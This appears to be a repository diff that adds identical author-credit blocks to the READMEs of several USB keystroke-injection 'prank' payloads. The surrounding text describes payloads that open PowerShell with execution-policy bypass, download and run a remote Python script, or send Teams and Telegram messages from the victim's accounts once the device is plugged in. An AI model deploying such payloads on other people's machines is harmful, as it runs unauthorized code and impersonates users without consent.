</table>
</div>

22
payloads/library/prank/Change_The_App_That_Will_Be_Runned/README.md
View File

@ -72,4 +72,24 @@ Exec=Exec=/usr/lib/code-oss/code-oss --unity-launch %F
# ...
```
![GIF](Change_The_App_That_Will_Be_Runned.gif)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

22
payloads/library/prank/Continuos Print In Terminal/README.md
View File

@ -23,3 +23,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
### Executing program
* Plug in your device
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/prank/Full-ScreenBannerJoke/README.md
View File

@ -18,10 +18,28 @@ Open a PowerShell, download the Python script and execute it. The Python script
* Python installed
* ExecutionPolicy Bypass
### Executing program
* Plug in your device
### Settings
- Setup your Python script link in the payload.txt file
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/prank/PlayASongThroughSpotify_Windows/README.md
View File

@ -18,10 +18,28 @@ A script used to prank friends by playing songs through Spotify. Open a PowerShe
* Spotify installed and user logged-in
* ExecutionPolicy Bypass
### Executing program
* Plug in your device
### Settings
- Setup the SONG-NAME that you want to play
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

22
payloads/library/prank/SendMessagesInTeams/README.md
View File

@ -22,3 +22,25 @@ Open a PowerShell, stop Teams if is runned, run Teams, run new message function,
### Settings
- Setup the receiver
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

28
payloads/library/prank/SendTelegramMessages_Linux/README.md
View File

@ -1,4 +1,4 @@
# Send Telegram Messages - Linux
# Send Telegram Messages - Linux
A script used to prank your friends sending messages by using Telegram app.
@ -17,11 +17,29 @@ Opens a shell, runs the telegram-desktop app, search the user by the id, enter i
* Internet Connection
* telegram-desktop installed and activated
### Executing program
* Plug in your device
### Settings
- Telegram username
- Messages
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

22
payloads/library/prank/The_Mouse_Moves_By_Itself/README.md
View File

@ -19,3 +19,25 @@ Opens a shell, dowloand the Python script that will prank your friends mouving t
### Settings
- Setup your Python script link in the payload.txt file
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>